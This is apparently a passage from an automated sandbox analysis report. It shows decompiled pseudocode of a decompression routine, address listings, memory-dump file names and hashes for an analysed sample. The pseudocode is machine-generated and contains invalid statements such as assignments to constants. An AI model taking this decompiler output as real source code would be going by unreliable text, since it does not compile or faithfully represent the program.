								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406f4a
0x00406f4a
0x00406f4e
0x00407005
0x00407008
0x00407014
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406f54
0x00406f58
0x00407499
0x00407499
0x0040749c
0x004074a0
0x004074a0
0x00406f5e
0x00406f64
0x00406f67
0x00406f6b
0x00406f6e
0x00406f72
0x00407438
0x00407484
0x0040748c
0x00407493
0x00407495
0x00000000
0x00407495
0x00406f78
0x00406f7b
0x00406f81
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00406fac
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
